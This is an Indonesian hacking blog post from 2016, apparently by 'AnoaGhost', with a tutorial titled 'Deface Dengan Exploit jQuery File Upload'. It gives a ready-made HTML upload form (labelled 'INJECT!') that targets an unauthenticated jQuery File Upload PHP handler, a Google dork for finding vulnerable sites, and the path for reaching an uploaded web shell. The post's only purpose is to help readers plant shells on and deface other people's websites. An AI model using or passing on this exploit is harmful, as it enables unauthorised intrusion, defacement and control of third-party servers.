Unknown On 12/05/16

Deface Dengan Exploit jQuery File Upload

Hai Minna, :)

CSRF:


<title>jQuery File Upload By AnoaGhost</title>
<center>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<font face="Iceland" color="red" size="7">jQuery File Upload By AnoaGhost</font>
<form method="POST" action="site.com/assets/global/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
<input type="file" name="files[]" /><button>INJECT!</button>
</form>

Dork: inurl:/assets/global/plugins/jquery-file-upload/

POC : site.com/assets/global/plugins/jquery-file-upload/server/php/


gambar 1

gambar diatas tadi menandakan bahwa target itu vuln...
masukkan web diatas tadi ke csrf exploitnya, terus uploadkan shell anda


gambar 2

gambar kedua adalah gambar yang berhasil di upload, kemudian kunjungi shell kalian di

Shell Access: 
site.com/assets/global/plugins/jquery-file-upload/server/php/files/shellmu.php

...

*Note : For Another if you not from Indonesian, translate my page ;)

Leave a Reply

Subscribe to Posts | Subscribe to Comments